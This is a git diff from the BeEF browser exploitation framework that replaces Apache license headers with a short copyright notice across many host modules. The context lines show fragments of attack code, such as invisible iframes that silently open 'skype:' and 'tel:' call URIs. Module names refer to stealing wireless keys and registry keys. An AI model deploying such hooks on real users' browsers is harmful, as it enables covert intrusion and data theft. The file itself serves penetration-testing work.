@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var result = "Not Installed";
diff --git a/modules/host/detect_cups/config.yaml b/modules/host/detect_cups/config.yaml
index 9b14c62f1..0658974e6 100644
--- a/modules/host/detect_cups/config.yaml
+++ b/modules/host/detect_cups/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/detect_cups/module.rb b/modules/host/detect_cups/module.rb
index a2cef67a4..fef9a3fc1 100644
--- a/modules/host/detect_cups/module.rb
+++ b/modules/host/detect_cups/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 class Detect_cups < BeEF::Core::Command
diff --git a/modules/host/detect_google_desktop/command.js b/modules/host/detect_google_desktop/command.js
index 428db53e0..c1749d5bb 100644
--- a/modules/host/detect_google_desktop/command.js
+++ b/modules/host/detect_google_desktop/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var dom = document.createElement('b');
diff --git a/modules/host/detect_google_desktop/config.yaml b/modules/host/detect_google_desktop/config.yaml
index ba611bf45..b3d42e577 100644
--- a/modules/host/detect_google_desktop/config.yaml
+++ b/modules/host/detect_google_desktop/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/detect_google_desktop/module.rb b/modules/host/detect_google_desktop/module.rb
index cadf07b80..949466bb9 100644
--- a/modules/host/detect_google_desktop/module.rb
+++ b/modules/host/detect_google_desktop/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 class Detect_google_desktop < BeEF::Core::Command
diff --git a/modules/host/detect_protocol_handlers/command.js b/modules/host/detect_protocol_handlers/command.js
index 90246fba2..b9c2c76bc 100644
--- a/modules/host/detect_protocol_handlers/command.js
+++ b/modules/host/detect_protocol_handlers/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	// Initialize
diff --git a/modules/host/detect_protocol_handlers/config.yaml b/modules/host/detect_protocol_handlers/config.yaml
index a3de123a2..60ec6d67d 100644
--- a/modules/host/detect_protocol_handlers/config.yaml
+++ b/modules/host/detect_protocol_handlers/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/detect_protocol_handlers/module.rb b/modules/host/detect_protocol_handlers/module.rb
index 13a295ac1..df7b205ff 100644
--- a/modules/host/detect_protocol_handlers/module.rb
+++ b/modules/host/detect_protocol_handlers/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # Some additional protocol handlers #
 # ChromeHTML, code, Explorer.AssocProtocol.search-ms, FirefoxURL, gopher, icy, ie.http, ie.https, ie.ftp, iehistory, ierss, irc, itms, magnet, mapi, mms, mmst, mmsu, msbd, msdigitallocker, nntp, opera.protocol, outlook, pcast, rlogin, sc, search, search-ms, shout, skype, snews, steam, stssync, teamspeak, tel, telnet, tn3270, ts3file, ts3server, unsv, uvox, ventrilo, winamp, WindowsCalendar.UrlWebcal.1, WindowsMail.Url.Mailto, WindowsMail.Url.news, WindowsMail.Url.nntp, WindowsMail.Url.snews, WMP11.AssocProtocol.MMS, wpc
diff --git a/modules/host/detect_software/command.js b/modules/host/detect_software/command.js
index 5abaac7a5..4ef214605 100644
--- a/modules/host/detect_software/command.js
+++ b/modules/host/detect_software/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
           var files = [
diff --git a/modules/host/detect_software/config.yaml b/modules/host/detect_software/config.yaml
index 4a0ff900c..7c44db54a 100644
--- a/modules/host/detect_software/config.yaml
+++ b/modules/host/detect_software/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/detect_software/module.rb b/modules/host/detect_software/module.rb
index df587f431..b35f81c24 100644
--- a/modules/host/detect_software/module.rb
+++ b/modules/host/detect_software/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Detect_software < BeEF::Core::Command
   
diff --git a/modules/host/get_internal_ip/command.js b/modules/host/get_internal_ip/command.js
index 9d207c1d1..575322055 100755
--- a/modules/host/get_internal_ip/command.js
+++ b/modules/host/get_internal_ip/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
     var applet_uri = 'http://'+beef.net.host+ ':' + beef.net.port + '/';
diff --git a/modules/host/get_internal_ip/config.yaml b/modules/host/get_internal_ip/config.yaml
index 68a4d63c3..9cb6d2072 100755
--- a/modules/host/get_internal_ip/config.yaml
+++ b/modules/host/get_internal_ip/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/get_internal_ip/module.rb b/modules/host/get_internal_ip/module.rb
index cb950806a..5f6948506 100755
--- a/modules/host/get_internal_ip/module.rb
+++ b/modules/host/get_internal_ip/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_internal_ip < BeEF::Core::Command
 
diff --git a/modules/host/get_registry_keys/command.js b/modules/host/get_registry_keys/command.js
index df90099bc..c0bb9377d 100644
--- a/modules/host/get_registry_keys/command.js
+++ b/modules/host/get_registry_keys/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var internal_counter = 0;
diff --git a/modules/host/get_registry_keys/config.yaml b/modules/host/get_registry_keys/config.yaml
index fda7b3d7a..9d0ef23a4 100644
--- a/modules/host/get_registry_keys/config.yaml
+++ b/modules/host/get_registry_keys/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/get_registry_keys/module.rb b/modules/host/get_registry_keys/module.rb
index 07d4e4d17..f8a530b52 100644
--- a/modules/host/get_registry_keys/module.rb
+++ b/modules/host/get_registry_keys/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_registry_keys < BeEF::Core::Command
 
diff --git a/modules/host/get_system_info/command.js b/modules/host/get_system_info/command.js
index 9eea6fb32..6e8f6c1bd 100644
--- a/modules/host/get_system_info/command.js
+++ b/modules/host/get_system_info/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var internal_counter = 0;
diff --git a/modules/host/get_system_info/config.yaml b/modules/host/get_system_info/config.yaml
index 7902a2381..1c7c1ca21 100644
--- a/modules/host/get_system_info/config.yaml
+++ b/modules/host/get_system_info/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/get_system_info/module.rb b/modules/host/get_system_info/module.rb
index 128db8a54..2511eedc6 100644
--- a/modules/host/get_system_info/module.rb
+++ b/modules/host/get_system_info/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_system_info < BeEF::Core::Command
   
diff --git a/modules/host/get_wireless_keys/module.rb b/modules/host/get_wireless_keys/module.rb
index 0a3f75be2..73bbe20b6 100644
--- a/modules/host/get_wireless_keys/module.rb
+++ b/modules/host/get_wireless_keys/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_wireless_keys < BeEF::Core::Command
   
diff --git a/modules/host/hook_default_browser/command.js b/modules/host/hook_default_browser/command.js
index 2e565a778..e765a693a 100644
--- a/modules/host/hook_default_browser/command.js
+++ b/modules/host/hook_default_browser/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	
 	var pdf_url =  'http://'+beef.net.host+ ':' + beef.net.port + '/report.pdf';
diff --git a/modules/host/hook_default_browser/config.yaml b/modules/host/hook_default_browser/config.yaml
index 56c276653..7d5bd425f 100644
--- a/modules/host/hook_default_browser/config.yaml
+++ b/modules/host/hook_default_browser/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/hook_default_browser/module.rb b/modules/host/hook_default_browser/module.rb
index bcb1488fb..e5ea146af 100644
--- a/modules/host/hook_default_browser/module.rb
+++ b/modules/host/hook_default_browser/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 class Hook_default_browser < BeEF::Core::Command
diff --git a/modules/host/insecure_url_skype/command.js b/modules/host/insecure_url_skype/command.js
index 6521d73bc..8e3df94e6 100644
--- a/modules/host/insecure_url_skype/command.js
+++ b/modules/host/insecure_url_skype/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	var sploit = beef.dom.createInvisibleIframe();
 	sploit.src = 'skype:<%= @tel_num %>?call';
diff --git a/modules/host/insecure_url_skype/config.yaml b/modules/host/insecure_url_skype/config.yaml
index cb35a4c23..a3a3eb9f2 100644
--- a/modules/host/insecure_url_skype/config.yaml
+++ b/modules/host/insecure_url_skype/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/insecure_url_skype/module.rb b/modules/host/insecure_url_skype/module.rb
index 2b19303ed..11e364837 100644
--- a/modules/host/insecure_url_skype/module.rb
+++ b/modules/host/insecure_url_skype/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Insecure_url_skype < BeEF::Core::Command
 
diff --git a/modules/host/iphone_tel/command.js b/modules/host/iphone_tel/command.js
index 18966fc49..63509f310 100644
--- a/modules/host/iphone_tel/command.js
+++ b/modules/host/iphone_tel/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	var sploit = beef.dom.createInvisibleIframe();
 	sploit.src = 'tel:<%= @tel_num %>';
diff --git a/modules/host/iphone_tel/config.yaml b/modules/host/iphone_tel/config.yaml
index 783637ed4..d9947a9cf 100644
--- a/modules/host/iphone_tel/config.yaml
+++ b/modules/host/iphone_tel/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/iphone_tel/module.rb b/modules/host/iphone_tel/module.rb
index 2d14f1c25..d2c422a68 100644
--- a/modules/host/iphone_tel/module.rb
+++ b/modules/host/iphone_tel/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
